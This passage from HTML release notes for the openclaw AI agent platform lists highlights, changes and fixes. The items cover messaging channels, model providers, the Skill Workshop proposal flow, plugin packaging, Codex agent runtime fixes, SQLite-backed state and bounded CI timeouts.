<li>Channels and mobile delivery are steadier across Telegram, WhatsApp, iMessage, Slack, Discord, Microsoft Teams, Google Chat, Google Meet, and iOS realtime Talk. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4550652541" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88096" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88096/hovercard" href="https://github.com/openclaw/openclaw/pull/88096">#88096</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4550870064" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88105" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88105/hovercard" href="https://github.com/openclaw/openclaw/pull/88105">#88105</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4552604231" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88183" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88183/hovercard" href="https://github.com/openclaw/openclaw/pull/88183">#88183</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4553214878" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88231" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88231/hovercard" href="https://github.com/openclaw/openclaw/pull/88231">#88231</a>)</li>
<li>Provider and plugin requests now bound more timers, retries, OAuth/device-code lifetimes, media downloads, local service probes, and generated-content polling paths before they can hang a run.</li>
<li>Skills, session metadata, gateway runtime state, plugin metadata, and store writes do less repeated work on hot paths while keeping config and dispatch behavior stable.</li>
<li>Skills and plugin loading now handle stale disabled snapshots and loader failures more clearly, so channel turns avoid disabled SecretRefs and operators get better recovery guidance. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4401582392" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/79072" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/79072/hovercard" href="https://github.com/openclaw/openclaw/issues/79072">#79072</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4403061400" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/79173" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/79173/hovercard" href="https://github.com/openclaw/openclaw/pull/79173">#79173</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zeus1959/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zeus1959">@zeus1959</a>.</li>
<li>Workboard, SecretRef plugin manifests, hosted iOS push relay, and external Copilot/Tokenjuice packaging add broader orchestration, integration, and plugin delivery surfaces. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4456977405" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82326" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82326/hovercard" href="https://github.com/openclaw/openclaw/pull/82326">#82326</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4536829250" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87469" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87469/hovercard" href="https://github.com/openclaw/openclaw/pull/87469">#87469</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4544177368" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87796" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87796/hovercard" href="https://github.com/openclaw/openclaw/pull/87796">#87796</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4550878888" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88107" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88107/hovercard" href="https://github.com/openclaw/openclaw/pull/88107">#88107</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551059990" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88117" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88117/hovercard" href="https://github.com/openclaw/openclaw/pull/88117">#88117</a>)</li>
<li>Skill Workshop now has a fuller Control UI flow with proposal lists, today actions, revision handoff, searchable file previews, review states, locale coverage, and reusable session routing.</li>
<li>Chat and Control UI startup paths keep sends alive through history loading, stream deltas incrementally, skip markdown work while streaming, keep drafts local while typing, trace first-output latency, and expose calmer composer controls. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4558851324" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88772" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88772/hovercard" href="https://github.com/openclaw/openclaw/pull/88772">#88772</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4559381540" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88825" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88825/hovercard" href="https://github.com/openclaw/openclaw/pull/88825">#88825</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4561424737" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88998" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88998/hovercard" href="https://github.com/openclaw/openclaw/pull/88998">#88998</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Provider coverage and model metadata now include MiniMax M3, account OAuth endpoints, Google/Vertex catalog fixes, OpenRouter SQLite model caching, Copilot Claude 1M capabilities, Foundry reasoning alignment, and OpenAI response replay guards. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4556082619" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88480" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/88480/hovercard" href="https://github.com/openclaw/openclaw/issues/88480">#88480</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4556466505" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88512" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88512/hovercard" href="https://github.com/openclaw/openclaw/pull/88512">#88512</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4559632397" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88851" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88851/hovercard" href="https://github.com/openclaw/openclaw/pull/88851">#88851</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4559735267" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88860" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88860/hovercard" href="https://github.com/openclaw/openclaw/pull/88860">#88860</a>)</li>
<li>iMessage monitor state, inbound queues, and plugin install ledgers moved toward SQLite-backed state so restarts and local monitors recover with less duplicate filesystem scanning. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4559074657" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88794" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88794/hovercard" href="https://github.com/openclaw/openclaw/pull/88794">#88794</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4559113281" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88797" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88797/hovercard" href="https://github.com/openclaw/openclaw/pull/88797">#88797</a>)</li>
<li>Release, CI, Docker, E2E, plugin install, and diagnostics lanes now cap more logs, response bodies, readiness probes, artifact checks, status polling, and rollback snapshots so failures report bounded proof instead of stalling.</li>
</ul>
<h3>Changes</h3>
<ul>
<li>Docs: add a dedicated Skill Workshop guide covering governed skill creation, reviewable proposals, CLI, Gateway, agent tool behavior, approval policy, support files, and recovery. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Skills: let the <code>skill_workshop</code> agent tool apply, reject, and quarantine explicit proposals through the guarded review flow. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Skills: let proposals carry approved support files under standard skill folders, with scanner, hash, and rollback safeguards. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Skills: let pending proposals be revised in place with versioned, dated proposal frontmatter before approval. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Skills: add Skill Workshop with pending proposals, CLI/Gateway review actions, rollback metadata, and the <code>skill_workshop</code> agent tool. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Skill Workshop: add the Control UI navigation, styled dashboard, proposal today view, revision dialog, file preview modal, searchable preview files, reusable session handoff, and localized strings.</li>
<li>Plugins: externalize Tokenjuice as the official <code>@openclaw/tokenjuice</code> plugin with npm and ClawHub publish metadata.</li>
<li>Plugins: externalize the GitHub Copilot agent runtime as the official <code>@openclaw/copilot</code> plugin with npm and ClawHub publish metadata.</li>
<li>iOS: add hosted push relay defaults, realtime Talk playback, and a guarded WebSocket ping path for more reliable mobile sessions. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4550652541" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88096" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88096/hovercard" href="https://github.com/openclaw/openclaw/pull/88096">#88096</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4550870064" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88105" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88105/hovercard" href="https://github.com/openclaw/openclaw/pull/88105">#88105</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4553214878" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88231" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88231/hovercard" href="https://github.com/openclaw/openclaw/pull/88231">#88231</a>)</li>
<li>iOS: support native iPad display layouts.</li>
<li>Workboard: add orchestration primitives and agent coordination tools for multi-agent planning and run tracking. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4536829250" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87469" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87469/hovercard" href="https://github.com/openclaw/openclaw/pull/87469">#87469</a>)</li>
<li>Workboard: wire task-backed board runs and show task comments in the edit modal.</li>
<li>Code mode: add internal namespaces for scoped agent/global sessions and exact namespace tool dispatch. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4549263089" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88043" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88043/hovercard" href="https://github.com/openclaw/openclaw/pull/88043">#88043</a>)</li>
<li>Code mode: add MCP API files and docs for code-mode integrations.</li>
<li>Control UI: add a Dreaming-tab agent selector and propagate the selected agent through Dreaming status, diary, and diary actions. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4395906736" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/78748" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/78748/hovercard" href="https://github.com/openclaw/openclaw/pull/78748">#78748</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stevenepalmer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stevenepalmer">@stevenepalmer</a>.</li>
<li>Control UI: add calmer chat composer controls, local draft typing state, and first-output latency instrumentation for active chat entry. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4558851324" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88772" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88772/hovercard" href="https://github.com/openclaw/openclaw/pull/88772">#88772</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4561424737" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88998" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88998/hovercard" href="https://github.com/openclaw/openclaw/pull/88998">#88998</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins: add a SecretRef provider integration manifest contract and extract shared LLM core packages for provider/plugin reuse. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4456977405" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82326" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82326/hovercard" href="https://github.com/openclaw/openclaw/pull/82326">#82326</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551059990" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88117" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88117/hovercard" href="https://github.com/openclaw/openclaw/pull/88117">#88117</a>)</li>
<li>Plugins: persist the plugin install index in SQLite so installed package lookup survives reloads with less filesystem scanning. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4559074657" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88794" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88794/hovercard" href="https://github.com/openclaw/openclaw/pull/88794">#88794</a>)</li>
<li>Providers: add MiniMax M3 model support. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4559735267" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88860" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88860/hovercard" href="https://github.com/openclaw/openclaw/pull/88860">#88860</a>)</li>
<li>Doctor: add disk space health checks and stabilize post-upgrade JSON probes.</li>
<li>Channels: store inbound queues in SQLite and migrate iMessage monitor state to SQLite-backed tracking. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4559113281" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88797" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88797/hovercard" href="https://github.com/openclaw/openclaw/pull/88797">#88797</a>)</li>
<li>Skills: add the core skills index and centralize skills runtime loading, status, filtering, and prompt formatting.</li>
</ul>
<h3>Fixes</h3>
<ul>
<li>Agents/TUI: keep local custom provider runs from loading plugin runtime and auth alias metadata when plugins are disabled.</li>
<li>Agents/TUI: restore in-flight TUI run switch-back behavior, keep no-policy native hook fallback available, guard vanished workspaces, and keep lightweight isolated subagents lightweight.</li>
<li>Agents/media: keep async image, music, and video generation starts from ending the Codex turn, so mixed requests can continue with summaries or other work while media renders in the background.</li>
<li>Agents/Codex: keep public OpenAI API-key profiles from being treated as native Codex app-server auth while preserving persisted Codex OAuth sessions.</li>
<li>Agents/Codex: stream Codex app-server final-answer partials to live reply previews, preserve ACP metadata in SQLite, prefer real tool results over synthetic repair output, prevent aborted app-server turn handles from lingering, migrate legacy OpenAI Codex <code>lastGood</code> auth state, and preserve workspace/session metadata through ACP runtime refactors. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4555235950" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88405" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/88405/hovercard" href="https://github.com/openclaw/openclaw/issues/88405">#88405</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4558386594" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88724" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88724/hovercard" href="https://github.com/openclaw/openclaw/pull/88724">#88724</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4558459446" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88730" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88730/hovercard" href="https://github.com/openclaw/openclaw/pull/88730">#88730</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Control UI: keep collapsed tool cards labeled with the tool name and action instead of generic output text. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Agents/Codex: surface Skill Workshop guidance in Codex app-server prompts when <code>skill_workshop</code> is available. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Agents/auth: write auth profiles atomically, add force re-login recovery, preserve workspaces during state-only uninstall, and compact before oversized turns so recovery paths avoid partial state.</li>
<li>Skills: skip disabled skill env overrides from stale persisted snapshots so disabled skill <code>apiKey</code> SecretRefs cannot abort embedded or channel turns. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4401582392" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/79072" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/79072/hovercard" href="https://github.com/openclaw/openclaw/issues/79072">#79072</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4403061400" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/79173" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/79173/hovercard" href="https://github.com/openclaw/openclaw/pull/79173">#79173</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zeus1959/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zeus1959">@zeus1959</a>.</li>
<li>CLI: avoid live catalog validation during <code>openclaw agents add</code>, so adding a secondary agent no longer depends on provider catalog availability. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370229397" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76284" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76284/hovercard" href="https://github.com/openclaw/openclaw/issues/76284">#76284</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4554276259" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88314" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88314/hovercard" href="https://github.com/openclaw/openclaw/pull/88314">#88314</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhangguiping-xydt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhangguiping-xydt">@zhangguiping-xydt</a>.</li>
<li>CLI: keep <code>plugins list --json</code> on the snapshot-only path so plugin sweeps avoid loading the full runtime status graph.</li>
<li>CLI/desktop: bridge WSL clipboard operations through the shell and recognize manual-update launchd jobs. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4558805270" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88764" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88764/hovercard" href="https://github.com/openclaw/openclaw/pull/88764">#88764</a>)</li>
<li>Plugins: make PixVerse external-plugin ClawHub metadata explicit and keep it out of bundled dist builds.</li>
<li>Plugins: clarify plugin loader failure guidance so missing or incompatible plugin packages point operators at the right repair path.</li>
<li>Plugins: preserve npm plugin roots after blocked installs, skip plugin-local <code>openclaw</code> peer symlinks during rollback snapshots, relink those peers after restore, isolate cached tool runtime siblings, and isolate web-provider factory failures so one bad plugin does not poison sibling runtime paths. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4375645088" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77237" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/77237/hovercard" href="https://github.com/openclaw/openclaw/pull/77237">#77237</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4559215204" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88807" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88807/hovercard" href="https://github.com/openclaw/openclaw/pull/88807">#88807</a>)</li>
<li>Cron: keep SQLite cron migrations compatible with legacy run-log tables, archived job stores, diagnostic cron names, and legacy one-shot delete-after-run behavior. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4554018071" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88285" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88285/hovercard" href="https://github.com/openclaw/openclaw/pull/88285">#88285</a>)</li>
<li>Cron: keep update delivery validation scoped, harden restart state, and retire MCP runtimes on isolated cron cleanup.</li>
<li>Memory: serialize QMD update/embed writes per store, preserve phase signals on read errors, harden envelope metadata sanitization, and rewrite generated transcript paths on rollover so memory/search state survives concurrent gateway and CLI activity. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4259457800" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66339" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66339/hovercard" href="https://github.com/openclaw/openclaw/issues/66339">#66339</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4510532697" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85931" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85931/hovercard" href="https://github.com/openclaw/openclaw/pull/85931">#85931</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/openperf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/openperf">@openperf</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amittell/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amittell">@amittell</a>.</li>
<li>Providers: bound generated media downloads from OpenAI, Runway, xAI, MiniMax, BytePlus, DashScope-compatible, FAL, OpenRouter, Google, Vydra, and Comfy providers.</li>
<li>Providers: resolve Google defaults to <code>google-generative-ai</code>, register Vertex static catalog rows, align Foundry reasoning metadata, skip DeepSeek V4 thinking params on Foundry fallback, use MiniMax account OAuth endpoints, preserve Copilot Claude 1M capabilities, suppress disabled Ollama reasoning output, keep OpenAI stop-finished tool calls, and avoid replay ids when the Responses store is disabled. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4556082619" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88480" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/88480/hovercard" href="https://github.com/openclaw/openclaw/issues/88480">#88480</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4556466505" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88512" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88512/hovercard" href="https://github.com/openclaw/openclaw/pull/88512">#88512</a>)</li>
<li>Providers: cap GitHub Copilot OAuth request timeouts before creating abort signals.</li>
<li>Cron: retry recurring jobs after transient model rate limits before waiting for the next scheduled slot.</li>
<li>Agents/Codex: keep live session locks during cleanup, recover interrupted CLI tool transcripts, preserve Codex auth and compaction session identity, clear orphan tool state, cap app-server idle timers, and keep media completion delivery retryable. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551374072" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88129" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88129/hovercard" href="https://github.com/openclaw/openclaw/pull/88129">#88129</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551617563" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88136" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88136/hovercard" href="https://github.com/openclaw/openclaw/pull/88136">#88136</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551806062" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88141" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88141/hovercard" href="https://github.com/openclaw/openclaw/pull/88141">#88141</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4552232095" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88162" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88162/hovercard" href="https://github.com/openclaw/openclaw/pull/88162">#88162</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4552583855" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88182" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88182/hovercard" href="https://github.com/openclaw/openclaw/pull/88182">#88182</a>)</li>
<li>Chat/UI: show Gateway chat failures as visible assistant messages in the Control UI instead of only setting an invisible error state.</li>
<li>Channels: cap Telegram, Discord, WhatsApp, Signal, Feishu, Google Chat, Microsoft Teams, QQBot, Nostr, Zalo, Zalouser, and Nextcloud-style request/retry timers; preserve SMS approval reply routes; and retry WhatsApp QR login 408 timeouts. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4552604231" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88183" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88183/hovercard" href="https://github.com/openclaw/openclaw/pull/88183">#88183</a>)</li>
<li>Security/config parsing: reject unsafe OAuth/token lifetimes, retry-after delays, inbound timestamps, response body sizes, command timeout config, sandbox observer token TTLs, and gateway WebSocket calls after close.</li>
<li>Providers/media: cap local service, model, usage, queue, generated media, TTS, music, workflow polling, and provider OAuth request timers across hosted and local providers.</li>
<li>Release/CI/E2E: bound release candidate reads, beta smoke REST calls, plugin npm verification commands, changelog restore, cross-OS process groups, kitchen-sink and bundled plugin readiness probes, secret-provider probes, Telegram credential timeouts, Control UI i18n and CLI startup metadata generation, Vitest routing, and mainline test flakes. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551354671" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88127" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88127/hovercard" href="https://github.com/openclaw/openclaw/pull/88127">#88127</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551653681" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88137" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88137/hovercard" href="https://github.com/openclaw/openclaw/pull/88137">#88137</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4552032597" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88155" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88155/hovercard" href="https://github.com/openclaw/openclaw/pull/88155">#88155</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4552192113" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88160" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88160/hovercard" href="https://github.com/openclaw/openclaw/pull/88160">#88160</a>)</li>
<li>Release/CI/E2E: keep Kitchen Sink live plugin MCP probes resolving source-checkout workspace packages and align the live gauntlet with current Kitchen Sink diagnostics.</li>
<li>Release/CI/E2E: run the secret-provider integration proof through the repo pnpm runner so native macOS and Windows validation use the hydrated package-manager shim.</li>
<li>Release/CI/E2E: run the Telegram desktop proof gateway through the repo pnpm runner so native macOS proof uses the hydrated package-manager shim.</li>
<li>Docs/CI: run Mintlify anchor checks through the repo pnpm runner so docs link validation works when pnpm is only available through the hydrated package-manager shim.</li>
<li>Agents: keep configured fallback model metadata typed so provider params, context-token caps, and media input limits do not break changed-gate typechecks.</li>
